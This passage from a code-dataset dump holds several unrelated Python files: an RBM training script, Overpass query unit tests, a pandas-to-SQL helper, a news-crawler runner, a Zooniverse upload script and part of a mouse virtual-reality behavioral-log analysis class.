p=v1_mean,\n dtype=theano.config.floatX)\n return [pre_sigmoid_v1, v1_mean, v1_sample]\n\n def gibbs_hvh(self, h0_sample):\n ''' This function implements one step of Gibbs sampling,\n starting from the hidden state\n Thin function would be useful for performing CD and PCD'''\n pre_sigmoid_v1, v1_mean, v1_sample = self.sample_v_given_h(h0_sample)\n pre_sigmoid_h1, h1_mean, h1_sample = self.sample_h_given_v(v1_sample)\n return [pre_sigmoid_v1, v1_mean, v1_sample,\n pre_sigmoid_h1, h1_mean, h1_sample]\n\n def gibbs_vhv(self, v0_sample):\n ''' This function implements one step of Gibbs sampling,\n starting from the visible state\n This function would be useful for sampling from the RBM'''\n pre_sigmoid_h1, h1_mean, h1_sample = self.sample_h_given_v(v0_sample)\n pre_sigmoid_v1, v1_mean, v1_sample = self.sample_v_given_h(h1_sample)\n return [pre_sigmoid_h1, h1_mean, h1_sample,\n pre_sigmoid_v1, v1_mean, v1_sample]\n\n\nif __name__ == '__main__':\n\n\n epsilon = 0.01\n learning_rate = 0.02\n vis_units = 10\n hid_units = 10\n num_units = vis_units + hid_units\n index = T.lscalar() # index to a mini batch\n x = T.matrix('x')\n batch_sz = 10\n\n\n mpf_optimizer = free_energy_dmpf_optimizer(epsilon=epsilon, visible_units= vis_units, hidden_units= hid_units,\n input = x,batch_sz =batch_sz)\n\n W = np.load('rbm_weight_10000.npy')\n print(W.shape)\n\n data = np.load('rbm_samples_10000.npy')\n n_train_batches = data.shape[0]//batch_sz\n\n data = theano.shared(value=np.asarray(data, dtype=theano.config.floatX),\n name = 'train', borrow = True)\n\n\n cost, updates = mpf_optimizer.get_cost_updates(learning_rate=learning_rate)\n\n train_mpf = theano.function(\n [index],\n cost,\n updates=updates,\n givens={\n x: data[index * batch_sz: (index + 1) * batch_sz],\n },\n #on_unused_input='warn',\n )\n\n training_epochs = 400\n\n start_time = timeit.default_timer()\n\n mean_epoch_error = []\n\n for epoch in range(training_epochs):\n\n mean_cost = []\n mean_batch_error = []\n norm_batch_error = []\n\n\n for batch_index in range(n_train_batches):\n\n a = train_mpf(batch_index)\n mean_cost += [a]\n W_prime = mpf_optimizer.W.get_value(borrow = True)\n\n error_W = np.sum((W - W_prime)**2)\n\n mean_batch_error += [error_W/(vis_units*hid_units)]\n\n mean_epoch_error += [np.mean(mean_batch_error)]\n\n norm_batch_error += [np.mean(mean_cost)]\n print('The cost for dmpf in epoch %d is %f, rmse is %f' % (epoch, norm_batch_error[-1], mean_batch_error[-1]))\n\n end_time = timeit.default_timer()\n\n pretraining_time = (end_time - start_time)\n\n print ('Training took %f minutes' % (pretraining_time / 60.))\n\n\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n ax1.set_title('SGD Diff between W and W_prime')\n plt.imshow(np.abs(W - W_prime), extent=[0,10,0,10],aspect = 'auto')\n plt.colorbar()\n plt.show()\n fig1.savefig('free_energy_Sgd_Imageseq.png')\n\n\n np.save('free_energy_Wprime.npy',W_prime)\n\n #index = np.random.random_integers(low=0,high=127,size = (100,))\n\n W1 = W_prime.ravel()\n W2 = W.ravel()\n #\n # index = np.random.random_integers(low=0,high=300,size = (100,))\n # W1 = W1[index]\n # W2 = W2[index]\n\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n ax1.set_title('SGD: Diff of Randomly 100 Weight')\n plt.plot(W1,'y')\n plt.plot(W2,'c')\n plt.legend(['Recover W', 'Original W'])\n plt.show()\n fig1.savefig('Free_Energy_Random_Diff.png')\n plt.close()\n\n print(mpf_optimizer.b_vis.get_value(borrow = True))\n\n print(mpf_optimizer.b_hid.get_value(borrow = True))\n\n\n\n\n\n\n\n","sub_path":"free_energy_dmpf.py","file_name":"free_energy_dmpf.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"432378151","text":"import unittest\n\nimport mock\n\nfrom catatom2osm.config import osm3s_servers\nfrom catatom2osm.exceptions import CatIOError\nfrom catatom2osm.overpass import Query\n\n\nclass TestQuery(unittest.TestCase):\n @mock.patch.object(Query, \"set_search_area\")\n def test_init(self, m_q):\n q = Query(\"foo\")\n self.assertEqual(q.output, \"xml\")\n self.assertEqual(q.down, \"(._;>>;);\")\n self.assertEqual(q.meta, \"out meta;\")\n self.assertEqual(q.area_id, \"\")\n self.assertEqual(q.bbox, \"\")\n self.assertEqual(q.statements, [])\n m_q.assert_called_once_with(\"foo\")\n self.assertEqual(q.url, \"\")\n q = Query(\"foo\", \"json\", False, False)\n self.assertEqual(q.output, \"json\")\n self.assertEqual(q.down, \"\")\n self.assertEqual(q.meta, \"out;\")\n\n def test_set_search_area(self):\n q = Query(\"12345678\")\n self.assertEqual(q.area_id, \"12345678\")\n q.set_search_area(\"1,-2, 3.1,-4.99\")\n self.assertEqual(q.bbox, \"1,-2, 3.1,-4.99\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"123456789\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"123x5678\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"-1\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"1, 2a, 3, 4\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"1, 2, 3\")\n with self.assertRaises(TypeError):\n q.set_search_area(\"1; 2; 3; 4\")\n\n def test_add(self):\n q = Query(\"1\").add(\"foo;bar;\")\n q.add([\"taz\", \"zap;\"]).add(\"raz\")\n self.assertEqual(set(q.statements), {\"foo\", \"bar\", \"taz\", \"zap\", \"raz\"})\n q.statements = []\n q.add(\"1\", \"2\", \"3\")\n self.assertEqual(set(q.statements), {\"1\", \"2\", \"3\"})\n\n def test_get_url(self):\n q = Query(\"1234\")\n self.assertEqual(q.get_url(), \"\")\n q.add(\"foo\", \"bar\")\n url = (\n osm3s_servers[0] + \"data=[out:xml][timeout:250];(area(3600001234)\"\n \"->.searchArea;foo(area.searchArea);bar(area.searchArea););\"\n \"(._;>>;);out meta;\"\n )\n self.assertEqual(q.get_url(), url)\n q = Query(\"1,2,3,4\", \"json\", False, False)\n q.add(\"foo\", \"bar\")\n url = \"taz?data=[out:json][timeout:250];(foo(1,2,3,4);\" \"bar(1,2,3,4););out;\"\n self.assertEqual(q.get_url(\"taz?\"), url)\n\n @mock.patch(\"catatom2osm.overpass.download\")\n def test_download(self, m_download):\n def raises_io(*args):\n raise CatIOError()\n\n def raises_io1(url, fn):\n if url == osm3s_servers[0]:\n raise CatIOError()\n\n q = Query(\"1,2,3,4\").add(\"foo\")\n q.download(\"bar\")\n m_download.wget.assert_called_once_with(q.get_url(), \"bar\")\n m_download.wget = raises_io\n with self.assertRaises(CatIOError):\n q.download(\"bar\")\n m_download.wget = raises_io1\n q.download(\"bar\")\n\n @mock.patch(\"catatom2osm.overpass.download\")\n def test_read(self, m_download):\n m_download.get_response.return_value.content = \"bar\"\n q = Query(\"1,2,3,4\").add(\"foo\")\n out = q.read()\n m_download.get_response.assert_called_once_with(q.get_url())\n self.assertEqual(out, \"bar\")\n","sub_path":"test/test_overpass.py","file_name":"test_overpass.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407452762","text":"import pandas as pd\nimport psycopg2\nfrom psycopg2 import sql\nimport StringIO\n\ndef cleanColumns(columns):\n cols = []\n for col in columns:\n col = col.replace(' ', '_')\n cols.append(col)\n return cols\n\ndef pd_to_sql(df,table_name,conn):\n data = StringIO.StringIO()\n df.columns = cleanColumns(df.columns)\n df.to_csv(data,header=False,index=False)\n data.seek(0)\n cur = conn.cursor()\n cur.execute(\"DROP TABLE {}\".format(table_name))\n empty_table = pd.io.sql.get_schema(df,table_name,con=conn)\n empty_table = empty_table.replace('\"','')\n cur.execute(empty_table)\n cur.copy_from(data,table_name,sep=\",\")\n conn.close()","sub_path":"DevInit/datahub_auto/pd_to_sql.py","file_name":"pd_to_sql.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368081723","text":"#coding:utf-8\r\nfrom config import MainConfig as m\r\nfrom logger import Logger\r\nimport threading,string\r\nfrom time import sleep\r\nfrom crawler import feng, huanqiu, netease, sina, tencent, xinhua\r\n\r\nlist = [feng, huanqiu, netease, sina, tencent, xinhua]\r\n\r\ndef thread_main(className):\r\n global count, mutex\r\n\r\n # 取得锁\r\n mutex.acquire()\r\n count = count + 1\r\n # 释放锁\r\n mutex.release()\r\n\r\n try:\r\n className.run()\r\n print(str(className) + \"Succeed!\")\r\n except:\r\n Logger.setLogger(m.log_path, 4, className + \" Spider Failed\")\r\n\r\n sleep(1)\r\n\r\ndef main():\r\n global count, mutex\r\n threads = []\r\n\r\n count = 1\r\n # 创建一个锁\r\n mutex = threading.Lock()\r\n # 先创建线程对象\r\n for x in list:\r\n threads.append(threading.Thread(target=thread_main, args=(x,)))\r\n # 启动所有线程\r\n for t in threads:\r\n t.start()\r\n # 主线程中等待所有子线程退出\r\n for t in threads:\r\n t.join()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n# def run():\r\n# try:\r\n# feng.run()\r\n# print(\"凤凰网爬虫成功\")\r\n# except:\r\n# print(\"凤凰网爬虫失败\")\r\n# try:\r\n# huanqiu.run()\r\n# print(\"环球网爬虫成功\")\r\n# except:\r\n# print(\"环球网爬虫失败\")\r\n# try:\r\n# netease.run()\r\n# print(\"网易新闻爬虫成功\")\r\n# except:\r\n# print(\"网易新闻爬虫失败\")\r\n# try:\r\n# sina.run()\r\n# print(\"新浪网爬虫成功\")\r\n# except:\r\n# print(\"新浪网爬虫失败\")\r\n# try:\r\n# tencent.run()\r\n# print(\"腾讯新闻爬虫成功\")\r\n# except:\r\n# print(\"腾讯新闻爬虫失败\")\r\n# try:\r\n# xinhua.run()\r\n# print(\"新华网爬虫成功\")\r\n# except:\r\n# print(\"新华网爬虫失败\")\r\n#\r\n# print(\"All Finished\")\r\n#\r\n# if __name__ == '__main__':\r\n# run()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"478848017","text":"# _*_ coding: utf-8 _*_\n# @Time : 2017/8/17 14:35\n# @Author : GanZiB\n# @Site : \n# @File : images-spider.py\n# @Software: PyCharm\n\nimport re\nimport urllib.request\nimport urllib.error\n\ndef craw(url, page):\n\thtmlList = urllib.request.urlopen(url).read()\n\thtmlListStr = str(htmlList)\n\tdivPattern = '
Query:\n \"\"\"Filter analyses by database entry id.\"\"\"\n return analyses.filter(Analysis.id == analysis_id)\n\n\nclass AnalysisFilter(Enum):\n \"\"\"Define Analysis filter functions.\"\"\"\n\n FILTER_BY_ID: Callable = filter_analyses_by_id\n\n\ndef apply_analysis_filter(\n analyses: Query,\n filter_functions: List[Callable],\n analysis_id: Optional[int] = None,\n) -> Query:\n \"\"\"Apply filtering functions and return filtered results.\"\"\"\n for function in filter_functions:\n analyses: Query = function(\n analyses=analyses,\n analysis_id=analysis_id,\n )\n return analyses\n","sub_path":"trailblazer/store/filters/analyses_filters.py","file_name":"analyses_filters.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387580873","text":"def check_word(w):\n # i : 두문자 사이의 거리, j : 첫문자의 인덱스\n for i in range(1,len(w)):\n dict={}\n for j in range(len(w)-i):\n new_word=w[j]+w[j+i]\n if(new_word in dict):\n return False\n dict[new_word]=1\n return True\n\nwhile(True):\n word=input()\n if(word=='*'): break\n if(len(word)<=2 or check_word(word)):\n print(word,\"is surprising.\")\n else:\n print(word,\"is NOT surprising.\")\n","sub_path":"6. 구현(Simulation)/1972.py","file_name":"1972.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72200558","text":"#Zooniverse upload module\nimport glob\nimport os\nimport pandas as pd\nfrom panoptes_client import Panoptes, Project, SubjectSet, Subject\nimport rasterio\nfrom rasterio.warp import calculate_default_transform, reproject, Resampling\nfrom PIL import Image\nimport numpy as np\n\nfrom deepforest import deepforest\nfrom deepforest import utilities\n\nimport tile_raster\nimport utils\n\ndef utm_project(path):\n\n #Everglades UTM Zone\n dst_crs = 'EPSG:32617'\n\n with rasterio.open(path) as src:\n transform, width, height = calculate_default_transform(\n src.crs, dst_crs, src.width, src.height, *src.bounds)\n kwargs = src.meta.copy()\n kwargs.update({\n 'crs': dst_crs,\n 'transform': transform,\n 'width': width,\n 'height': height\n })\n\n dest_name = \"{}_projected.tif\".format(os.path.splitext(path)[0])\n\n with rasterio.open(dest_name, 'w', **kwargs) as dst:\n for i in range(1, src.count + 1):\n reproject(\n source=rasterio.band(src, i),\n destination=rasterio.band(dst, i),\n src_transform=src.transform,\n src_crs=src.crs,\n dst_transform=transform,\n dst_crs=dst_crs,\n resampling=Resampling.nearest)\n\n return dest_name\n\ndef is_white(path):\n d = rasterio.open(path)\n numpy_image = d.read()\n left, bottom, right, top = d.bounds\n\n assert numpy_image.shape[0] == 3\n\n #Check if image is all white\n img_reshaped = numpy_image.reshape(-1, 3)\n white = np.sum(img_reshaped == [255,255,255])/img_reshaped.size\n\n if white > 0.55:\n return True\n else:\n return False\n\ndef find_files(path):\n \"\"\"Search and filter images\"\"\"\n images = {}\n image_paths = glob.glob(os.path.join(path, \"*.tif\"))\n counter = 1\n\n #extract site name\n site_name = os.path.basename(path)\n\n for i in image_paths:\n #Load and get metadata\n d = rasterio.open(i)\n numpy_image = d.read()\n left, bottom, right, top = d.bounds\n\n #Write as a png\n basename = os.path.splitext(i)[0]\n png_name = \"{}.png\".format(basename)\n img = Image.open(i)\n img.save(png_name)\n\n #Create dict\n #crs = d.crs.to_epsg()\n crs = None\n images[png_name] = {\"subject_reference\":counter, \"bounds\":[left,bottom,right,top],\"crs\":crs,\"site\":site_name,\"resolution\":d.res,\"filename\":png_name}\n counter +=1\n\n return images\n\n#Create manifests\ndef create_subject_set(everglades_watch, name=\"demo\"):\n subject_set = SubjectSet()\n subject_set.links.project = everglades_watch\n subject_set.display_name = name\n subject_set.save()\n\n return subject_set\n\ndef upload(subject_set, images, everglades_watch):\n \"\"\"Assign images to projecti\"\"\"\n new_subjects = []\n\n print(\"Uploading {} images\".format(len(images)))\n for filename, metadata in images.items():\n subject = Subject()\n\n subject.links.project = everglades_watch\n subject.add_location(filename)\n\n subject.metadata.update(metadata)\n\n #Trigger upload\n subject.save()\n new_subjects.append(subject)\n subject_set.add(new_subjects)\n\ndef screen_blanks(images, model):\n #Load detection model\n model = deepforest.deepforest(weights=model)\n #model.classes_file = utilities.create_classes(\"/orange/ewhite/everglades/Zooniverse/parsed_images/test.csv\") \n #model.read_classes()\n screened_images = {}\n for filename, metadata in images.items():\n boxes = model.predict_image(filename, return_plot=False)\n\n #small score filter\n boxes = boxes[boxes.score > 0.4]\n \n if not boxes.empty:\n #if any([x in boxes.label.unique() for x in [\"Great Blue Heron\",\"Snowy Egret\",\"Wood Stork\",\"Roseate Spoonbill\"]]):\n screened_images[filename] = metadata\n else:\n print(\"Remove {}, screened empty\".format(filename))\n\n return screened_images\n\ndef main(path, everglades_watch, model=None, save_dir=\"/orange/ewhite/everglades/Zooniverse/\"):\n \"\"\"Args:\n path: a .tif to run\n \"\"\"\n #Create new directory in save_dir\n \n basename = os.path.splitext(os.path.basename(path))[0]\n event = os.path.basename(os.path.dirname(os.path.dirname(path))).replace(\" \",\"\")\n basename = \"{}_{}\".format(event,basename)\n dirname = \"{}/{}\".format(save_dir,basename)\n\n try:\n os.mkdir(dirname)\n except:\n pass\n #raise ValueError(\"dirname: {} exists)\".format(dirname))\n\n #Crop tif\n #Project from longlat to utm\n #check if exists\n #projected_raster_path = \"{}_projected.tif\".format(os.path.splitext(path)[0])\n #if not os.path.exists(projected_raster_path):\n #projected_raster_path = utm_project(path)\n\n saved_file = tile_raster.run(path=path, save_dir=dirname)\n print(\"Created cropped files at {}\".format(saved_file))\n\n #Generate metadata\n images = find_files(saved_file)\n\n #Screen for blanks\n if model:\n screened_images = screen_blanks(images, model)\n print(\"{} images ready for upload\".format(len(screened_images)))\n else:\n screened_images = images\n \n #Create a new subject set\n subject_set = create_subject_set(name=\"{}\".format(basename), everglades_watch=everglades_watch)\n\n #Upload\n upload(subject_set, screened_images, everglades_watch)\n\n return saved_file\n\nif __name__ == \"__main__\":\n\n #auth\n everglades_watch = utils.connect()\n \n model = \"/orange/ewhite/everglades/Zooniverse/predictions/20210224_121421.h5\"\n\n #Currently debugging with just one site\n paths = glob.glob(\"/orange/ewhite/everglades/WadingBirds2020/Raw/Cypress City_03_25_2020/Mapping Photos/*.JPG\")\n paths = [x for x in paths if \"projected\" not in x]\n for path in paths:\n print(path)\n saved_file = main(path, everglades_watch, model)","sub_path":"Zooniverse/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645866239","text":"list1 = [1, 23, 34, 54, 213, 2, 6]\nlist2 = [1, 23, 4, 2, 3, 5]\n\ncommon = []\nfor x in list1:\n for y in list2:\n if x == y:\n common.append(x)\n\n\nprint(common)\n\n","sub_path":"LIST/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441630476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated in Mar 2019\n@author: bbujfalussy - ubalazs317@gmail.com\nA script to read behavioral log files in mouse in vivo virtual reality experiments\n\n\"\"\"\n\nimport numpy as np\nfrom string import *\nimport datetime\nimport time\nimport os\nimport pickle\nimport scipy.stats\nfrom scipy.interpolate import interp1d \nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\nimport sys\nfrom sys import version_info\nimport csv\n\nfrom Stages import *\nfrom Corridors import *\n\ndef nan_divide(a, b, where=True):\n 'division function that returns np.nan where the division is not defined'\n N = len(a)\n x = np.zeros(N)\n x.fill(np.nan)\n x = np.divide(a, b, out=x, where=where)\n return x\n\ndef nan_add(a, b):\n 'addition function that handles NANs by replacing them with zero - USE with CAUTION!'\n a[np.isnan(a)] = 0\n b[np.isnan(b)] = 0\n x = np.array(a + b)\n return x\n\nclass Lap_Data:\n 'common base class for individual laps'\n\n def __init__(self, name, lap, laptime, position, lick_times, reward_times, corridor, mode, actions, corridor_list, dt=0.01, printout=False):\n self.name = name\n self.lap = lap\n\n self.raw_time = laptime\n self.raw_position = position\n self.lick_times = lick_times\n self.reward_times = reward_times\n self.corridor = corridor # the ID of the corridor in the given stage; This indexes the corridors in the vector called self.corridors\n self.corridor_list = corridor_list \n self.mode = mode # 1 if all elements are recorded in 'Go' mode\n self.actions = actions\n self.speed_threshold = 5 ## cm / s 106 cm - 3500 roxels; roxel/s * 106.5/3500 = cm/s\n self.corridor_length_roxel = (self.corridor_list.corridors[self.corridor].length - 1024.0) / (7168.0 - 1024.0) * 3500\n\n self.speed_factor = 106.5 / 3500 ## constant to convert distance from pixel to cm\n self.corridor_length_cm = self.corridor_length_roxel * self.speed_factor # cm\n\n self.zones = np.vstack([np.array(self.corridor_list.corridors[self.corridor].reward_zone_starts), np.array(self.corridor_list.corridors[self.corridor].reward_zone_ends)])\n self.n_zones = np.shape(self.zones)[1]\n self.preZoneRate = [None, None] # only if 1 lick zone; Compare the 210 roxels just before the zone with the preceeding 210 \n\n self.dt = 0.01 # resampling frequency = 100 Hz\n\n ####################################################################\n ## resample time and position with a uniform 100 Hz\n nbins = int(round(self.corridor_length_roxel / 70))\n self.bincenters = np.arange(0, self.corridor_length_roxel, 70) + 70 / 2.0\n \n if (len(self.raw_time) > 2):\n F = interp1d(self.raw_time,self.raw_position) \n start_time = np.ceil(self.raw_time.min()/self.dt)*self.dt\n end_time = np.floor(self.raw_time.max()/self.dt)*self.dt\n Ntimes = int(round((end_time - start_time) / self.dt)) + 1\n self.laptime = np.linspace(start_time, end_time, Ntimes)\n ppos = F(self.laptime)\n \n self.lick_position = F(self.lick_times)\n self.reward_position = F(self.reward_times)\n \n ## smooth the position data with a 50 ms Gaussian kernel\n ## smooth the position data with a 50 ms Gaussian kernel\n # sdfilt = 0.05\n # xfilt = np.arange(-4*sdfilt, 4*sdfilt+self.dt, self.dt)\n # filt = np.exp(-(xfilt ** 2) / (2 * (sdfilt**2)))\n # filt = filt / sum(filt)\n\n # dx1 = ppos[1] - ppos[0]\n # dxx1 = ppos[0] - np.arange(20, 0, -1) * dx1\n\n # dx2 = ppos[-1] - ppos[-2]\n # dxx2 = ppos[-1] + np.arange(20, 0, -1) * dx2\n\n # pppos = np.hstack([dxx1, ppos, dxx2])\n # pppos = np.hstack([np.repeat(ppos[0], 20), ppos, np.repeat(ppos[-1], 20)])\n # smooth_position = np.convolve(pppos, filt, mode='valid')\n self.smooth_position = ppos\n \n ## calculate the smoothed speed \n speed = np.diff(self.smooth_position) * self.speed_factor / self.dt # roxel [=rotational pixel] / s \n speed_first = 2 * speed[0] - speed[1] # linear extrapolation: x1 - (x2 - x1)\n self.speed = np.hstack([speed_first, speed])\n \n ####################################################################\n ## calculate the lick-rate and the average speed versus location \n bin_counts = np.zeros(nbins)\n for pos in self.smooth_position:\n bin_number = int(pos // 70)\n bin_counts[bin_number] += 1\n self.T_pos = bin_counts * self.dt\n \n lbin_counts = np.zeros(nbins)\n for lpos in self.lick_position:\n lbin_number = int(lpos // 70)\n lbin_counts[lbin_number] += 1\n self.N_licks = lbin_counts\n self.lick_rate = nan_divide(self.N_licks, self.T_pos, where=(self.T_pos > 0.025))\n \n total_speed = np.zeros(nbins)\n for i in range(len(self.smooth_position)):\n ii = int(self.smooth_position[i] // 70)\n total_speed[ii] = total_speed[ii] + self.speed[i]\n total_speed = total_speed * self.dt\n self.ave_speed = nan_divide(total_speed, self.T_pos, where=(self.T_pos > 0.025))\n \n ####################################################################\n ## Calculate the lick rate befor the reward zone - anticipatory licks 210 roxels before zone start\n ## only when the number of zones is 1!\n \n if (self.n_zones == 1):\n \n zone_start = int(self.zones[0][0] * self.corridor_length_roxel)\n lz_posbins = [0, zone_start-420, zone_start-210, zone_start, self.corridor_length_roxel]\n \n lz_bin_counts = np.zeros(4)\n for pos in self.smooth_position:\n bin_number = [ n for n,i in enumerate(lz_posbins) if i>=pos ][0] - 1\n lz_bin_counts[bin_number] += 1\n T_lz_pos = lz_bin_counts * self.dt\n \n lz_lbin_counts = np.zeros(4)\n for lpos in self.lick_position:\n lbin_number = [ n for n,i in enumerate(lz_posbins) if i>=lpos ][0] - 1\n lz_lbin_counts[lbin_number] += 1\n lz_lick_rate = nan_divide(lz_lbin_counts, T_lz_pos, where=(T_lz_pos>0.025))\n self.preZoneRate = [lz_lick_rate[1], lz_lick_rate[2]]\n else:\n self.lick_position = lick_times\n self.reward_position = reward_times\n self.smooth_position = position\n self.speed = np.zeros(len(position))\n self.T_pos = np.zeros(nbins)\n self.N_licks = np.zeros(nbins)\n self.ave_speed = np.zeros(nbins)\n self.lick_rate = np.zeros(nbins)\n self.preZoneRate = np.zeros(2)\n \n\n def plot_tx(self):\n cmap = plt.cm.get_cmap('jet') \n plt.figure(figsize=(6,4))\n plt.plot(self.laptime, self.smooth_position, c=cmap(50))\n plt.plot(self.raw_time, self.raw_position, c=cmap(90))\n\n plt.scatter(self.lick_times, np.repeat(self.smooth_position.min(), len(self.lick_times)), marker=\"|\", s=100, c=cmap(180))\n plt.scatter(self.reward_times, np.repeat(self.smooth_position.min()+100, len(self.reward_times)), marker=\"|\", s=100, c=cmap(230))\n plt.ylabel('position')\n plt.xlabel('time (s)')\n plot_title = 'Mouse: ' + self.name + ' position in lap ' + str(self.lap) + ' in corridor ' + str(self.corridor)\n plt.title(plot_title)\n plt.ylim(0, self.corridor_length_roxel)\n\n plt.show(block=False)\n \n # time = mm.Laps[55].time\n # smooth_position = mm.Laps[55].smooth_position\n # lick_times = mm.Laps[55].lick_times\n # reward_times = mm.Laps[55].reward_times\n # lap = mm.Laps[55].lap\n # corridor = mm.Laps[55].corridor\n # lick_rate = mm.Laps[55].lick_rate\n # bincenters = np.arange(0, 3500, 175) + 175 / 2.0\n\n # plt.figure(figsize=(6,4))\n # plt.plot(laptime, smooth_position, c='g')\n\n # plt.scatter(lick_times, np.repeat(smooth_position.min(), len(lick_times)), marker=\"|\", s=100)\n # plt.scatter(reward_times, np.repeat(smooth_position.min()+100, len(reward_times)), marker=\"|\", s=100, c='r')\n # plt.ylabel('position')\n # plt.xlabel('time (s)')\n # plot_title = 'Mouse: ' + name + ' position in lap ' + str(lap) + ' in corridor ' + str(corridor)\n # plt.title(plot_title)\n\n # plt.show(block=False)\n\n def plot_xv(self):\n cmap = plt.cm.get_cmap('jet') \n\n fig, ax = plt.subplots(figsize=(6,4))\n plt.plot(self.smooth_position, self.speed, c=cmap(80))\n plt.step(self.bincenters, self.ave_speed, where='mid', c=cmap(30))\n plt.scatter(self.lick_position, np.repeat(5, len(self.lick_position)), marker=\"|\", s=100, c=cmap(180))\n plt.scatter(self.reward_position, np.repeat(10, len(self.reward_position)), marker=\"|\", s=100, c=cmap(230))\n plt.ylabel('speed (cm/s)')\n plt.ylim([min(0, self.speed.min()), max(self.speed.max(), 30)])\n plt.xlabel('position')\n plot_title = 'Mouse: ' + self.name + ' speed in lap ' + str(self.lap) + ' in corridor ' + str(self.corridor)\n plt.title(plot_title)\n\n\n bottom, top = plt.ylim()\n left = self.zones[0,0] * self.corridor_length_roxel\n right = self.zones[1,0] * self.corridor_length_roxel\n\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax.add_patch(polygon)\n if (self.n_zones > 1):\n for i in range(1, np.shape(self.zones)[1]):\n left = self.zones[0,i] * self.corridor_length_roxel\n right = self.zones[1,i] * self.corridor_length_roxel\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax.add_patch(polygon)\n\n ax2 = plt.twinx()\n ax2.step(self.bincenters, self.lick_rate, where='mid', c=cmap(200), linewidth=1)\n ax2.set_ylabel('lick rate (lick/s)', color=cmap(200))\n ax2.tick_params(axis='y', labelcolor=cmap(200))\n ax2.set_ylim([-1,max(2*np.nanmax(self.lick_rate), 20)])\n\n plt.show(block=False) \n\n\n # cmap = plt.cm.get_cmap('jet') \n # smooth_position = mm.Laps[55].smooth_position\n # speed = mm.Laps[55].speed\n # lick_position = mm.Laps[55].lick_position\n # lick_times = mm.Laps[55].lick_times\n # reward_position = mm.Laps[55].reward_position\n # reward_times = mm.Laps[55].reward_times\n # lap = mm.Laps[55].lap\n # corridor = mm.Laps[55].corridor\n # lick_rate = mm.Laps[55].lick_rate\n # ave_speed = mm.Laps[55].ave_speed\n # zones = mm.Laps[0].zones\n # bincenters = np.arange(0, 3500, 175) + 175 / 2.0\n\n # fig, ax = plt.subplots(figsize=(6,4))\n # ax.plot(smooth_position, speed, c=cmap(80))\n # ax.plot(bincenters, ave_speed, c=cmap(30))\n # ax.scatter(lick_position, np.repeat(speed.min(), len(lick_position)), marker=\"|\", s=100, c=cmap(180))\n # ax.scatter(reward_position, np.repeat(speed.min(), len(reward_position)), marker=\"|\", s=100, c=cmap(230))\n # plt.ylabel('speed (roxel/s)')\n # plt.xlabel('position')\n # plot_title = 'Mouse: ' + name + ' speed in lap ' + str(lap) + ' in corridor ' + str(corridor)\n # plt.title(plot_title)\n\n # bottom, top = plt.ylim()\n # left = zones[0,0] * 3500\n # right = zones[1,0] * 3500\n\n # polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n # if (np.shape(zones)[1] > 1):\n # for i in range(1, np.shape(zones)[1]):\n # left = zones[0,i] * 3500\n # right = zones[1,i] * 3500\n # polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n # ax.add_patch(polygon)\n\n\n # ax2 = plt.twinx()\n # ax2.plot(bincenters, lick_rate, c=cmap(200), linewidth=1)\n # ax2.set_ylabel('lick rate', color=cmap(200))\n # ax2.tick_params(axis='y', labelcolor=cmap(200))\n # ax2.set_ylim([-1,2*max(lick_rate)])\n\n # plt.show(block=False) \n\n\n def plot_txv(self):\n cmap = plt.cm.get_cmap('jet') \n fig, (ax_top, ax_bottom) = plt.subplots(2, 1, figsize=(6,6))\n\n ## first, plot position versus time\n ax_top.plot(self.laptime, self.smooth_position, c=cmap(50))\n ax_top.plot(self.raw_time, self.raw_position, c=cmap(90))\n\n ax_top.scatter(self.lick_times, np.repeat(200, len(self.lick_times)), marker=\"|\", s=100, c=cmap(180))\n ax_top.scatter(self.reward_times, np.repeat(400, len(self.reward_times)), marker=\"|\", s=100, c=cmap(230))\n ax_top.set_ylabel('position')\n ax_top.set_xlabel('time (s)')\n plot_title = 'Mouse: ' + self.name + ' position and speed in lap ' + str(self.lap) + ' in corridor ' + str(self.corridor)\n ax_top.set_title(plot_title)\n ax_top.set_ylim(0, self.corridor_length_roxel + 100)\n\n\n ## next, plot speed versus position\n ax_bottom.plot(self.smooth_position, self.speed, c=cmap(80))\n ax_bottom.step(self.bincenters, self.ave_speed, where='mid', c=cmap(30))\n ax_bottom.scatter(self.lick_position, np.repeat(5, len(self.lick_position)), marker=\"|\", s=100, c=cmap(180))\n ax_bottom.scatter(self.reward_position, np.repeat(10, len(self.reward_position)), marker=\"|\", s=100, c=cmap(230))\n 